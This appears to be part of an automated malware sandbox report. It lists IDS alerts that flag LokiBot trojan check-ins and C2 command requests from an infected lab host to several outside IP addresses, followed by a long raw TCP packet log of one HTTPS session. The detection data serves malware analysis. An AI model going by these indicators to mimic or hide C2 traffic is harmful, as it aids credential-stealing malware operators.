05/23/24-20:18:48.359257	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49229	80	192.168.2.22	188.114.96.9
05/23/24-20:17:59.837093	TCP	2025381	ET TROJAN LokiBot Checkin	49186	80	192.168.2.22	188.114.97.3
05/23/24-20:18:57.792134	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49239	80	192.168.2.22	188.114.97.3
05/23/24-20:18:47.441038	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49228	80	192.168.2.22	188.114.96.3
05/23/24-20:18:51.088057	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49232	80	192.168.2.22	188.114.97.3
05/23/24-20:17:44.106859	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49171	80	192.168.2.22	188.114.97.3
05/23/24-20:18:00.736741	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49187	80	192.168.2.22	188.114.96.3
05/23/24-20:18:29.294238	TCP	2025381	ET TROJAN LokiBot Checkin	49213	80	192.168.2.22	188.114.96.3
05/23/24-20:19:16.882044	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49260	80	192.168.2.22	188.114.96.3
05/23/24-20:17:44.106859	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49171	80	192.168.2.22	188.114.97.3
05/23/24-20:18:47.441038	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49228	80	192.168.2.22	188.114.96.3
05/23/24-20:18:53.400223	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49234	80	192.168.2.22	188.114.96.3
05/23/24-20:18:30.098368	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49214	80	192.168.2.22	188.114.96.9
05/23/24-20:18:45.625277	TCP	2025381	ET TROJAN LokiBot Checkin	49226	80	192.168.2.22	188.114.96.3
05/23/24-20:18:53.400223	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49234	80	192.168.2.22	188.114.96.3
05/23/24-20:17:49.147570	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49176	80	192.168.2.22	188.114.96.3
05/23/24-20:19:18.441021	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49262	80	192.168.2.22	188.114.96.3
05/23/24-20:17:46.332436	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49173	80	192.168.2.22	188.114.96.3
05/23/24-20:17:46.332436	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49173	80	192.168.2.22	188.114.96.3
05/23/24-20:19:18.441021	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49262	80	192.168.2.22	188.114.96.3
05/23/24-20:17:48.088333	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49175	80	192.168.2.22	188.114.97.3
05/23/24-20:17:49.147570	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49176	80	192.168.2.22	188.114.96.3
05/23/24-20:18:56.093323	TCP	2025381	ET TROJAN LokiBot Checkin	49237	80	192.168.2.22	188.114.97.3
05/23/24-20:18:20.882874	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49204	80	192.168.2.22	188.114.96.9
05/23/24-20:19:04.226888	TCP	2025381	ET TROJAN LokiBot Checkin	49246	80	192.168.2.22	188.114.96.9
05/23/24-20:17:47.208604	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49174	80	192.168.2.22	188.114.97.3
05/23/24-20:17:47.208604	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49174	80	192.168.2.22	188.114.97.3
05/23/24-20:18:38.560340	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49218	80	192.168.2.22	188.114.97.9
05/23/24-20:18:38.560340	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49218	80	192.168.2.22	188.114.97.9
05/23/24-20:19:08.863871	TCP	2025381	ET TROJAN LokiBot Checkin	49251	80	192.168.2.22	188.114.96.3
05/23/24-20:19:07.888746	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49250	80	192.168.2.22	188.114.96.3
05/23/24-20:18:20.882874	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49204	80	192.168.2.22	188.114.96.9
05/23/24-20:18:43.784658	TCP	2025381	ET TROJAN LokiBot Checkin	49224	80	192.168.2.22	188.114.97.3
05/23/24-20:18:02.368807	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49189	80	192.168.2.22	188.114.96.3
05/23/24-20:18:42.915752	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49223	80	192.168.2.22	188.114.97.3
05/23/24-20:18:57.792134	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49239	80	192.168.2.22	188.114.97.3
05/23/24-20:18:02.368807	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49189	80	192.168.2.22	188.114.96.3
05/23/24-20:17:48.088333	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49175	80	192.168.2.22	188.114.97.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 20:17:25.277729988 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:25.277774096 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:25.277848005 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:25.302416086 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:25.302438021 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:25.826999903 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:25.827092886 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:25.833144903 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:25.833174944 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:25.833489895 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:25.833549976 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:25.905293941 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:25.950560093 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.028554916 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.028747082 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.028794050 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.028882027 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.032548904 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.032641888 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.032686949 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.032763004 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.032777071 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.032841921 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.040954113 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.041029930 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.045046091 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.045129061 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.053189993 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.053272009 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.053292990 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.053342104 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.061530113 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.061613083 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.061641932 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.061707020 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.067531109 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.067594051 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.067640066 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.067689896 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.067794085 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.067832947 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.144942999 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.145025969 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.148008108 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.148060083 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.151034117 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.151087999 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.151114941 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.151175976 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.158830881 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.158912897 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.160881996 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.160947084 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.160994053 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.161039114 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.166162014 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.166235924 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.166274071 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.166321039 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.170943975 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.170998096 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.175255060 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.175311089 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.175332069 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.175381899 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.175386906 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.175417900 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.178937912 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.178987026 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.178997993 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.179028988 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.182249069 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.182306051 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.182311058 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.182356119 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.186232090 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.186286926 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.190236092 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.190304995 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.190310001 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.190365076 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.194274902 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.194333076 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.194341898 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.194387913 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.197766066 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.197823048 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.197832108 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.197871923 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.197875977 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.197909117 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.200972080 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.201034069 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.204163074 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.204230070 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.283566952 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.283689976 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.287925005 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.288017988 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.299487114 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.299561977 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.299612999 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.299659014 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.301398993 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.301466942 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.307506084 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.307579041 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.310045004 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.310256958 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.315762997 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.315843105 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.318418026 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.318500042 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.323731899 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.323812962 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.326098919 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.326169968 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.330784082 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.330914021 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.333544970 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.333619118 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.336842060 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.336915970 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.341258049 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.341337919 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.343158960 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.343244076 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.382205009 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.382474899 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.383126020 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.383213043 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.386806011 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.386876106 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.386897087 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.386913061 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.386964083 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.388637066 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.388735056 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.390616894 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.390701056 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.393964052 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.394031048 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.396064997 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.396152020 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.402153969 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.402231932 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.402627945 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.402681112 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.419683933 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.419738054 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.419902086 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.419943094 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.420007944 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.420372963 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.420439959 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.423577070 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.423640966 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.424957037 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.425043106 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.427736044 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.427802086 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.430054903 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.430150032 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.433017015 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.433104038 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.435446978 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.435519934 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.436175108 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.436237097 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.438134909 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.438205957 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.440522909 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.440583944 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.442591906 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.442655087 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.472868919 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.473011017 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.475490093 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.475564003 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.480178118 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.480191946 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.480257034 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.480263948 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.480336905 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.480370045 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.480391026 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.485344887 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.485388994 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.485439062 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.485439062 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.485485077 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.485538960 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.490573883 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.490617990 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.490669966 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.490729094 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.490772963 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.490772963 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.490817070 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.495158911 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.495210886 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.495233059 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.495279074 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.495312929 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.495313883 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.495341063 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.517064095 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.517113924 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.517158985 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.517185926 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.517484903 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.517484903 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.517484903 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.521167994 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.521220922 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.521251917 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.521272898 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.521289110 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.521315098 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.524385929 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.524431944 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.524461985 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.524477959 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.524492979 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.524523020 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.527878046 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.527925014 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.527951002 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.527962923 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.527988911 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.527988911 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.528002977 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.572071075 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.572221041 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.572226048 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.572257996 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.572290897 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.572325945 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.572325945 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.575368881 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.575467110 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.575509071 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.575568914 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.577838898 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.577914000 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.577971935 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.578027964 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.580518007 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.580598116 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.580650091 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.580703974 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.614784002 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.614836931 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.614896059 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.614931107 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.614952087 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.614952087 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.614978075 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.617564917 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.617619038 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.617649078 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.617656946 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.617671013 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.617680073 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.617700100 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.620285034 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.620328903 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.620410919 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.620429993 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.620452881 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.620475054 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.625143051 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.625196934 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.625335932 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.625349045 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.625381947 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.625396967 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.695094109 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.695185900 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.695200920 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.695271969 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.695313931 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.695313931 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.695342064 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.697206974 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.697276115 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.697285891 CEST	49163	443	192.168.2.22	104.21.74.191
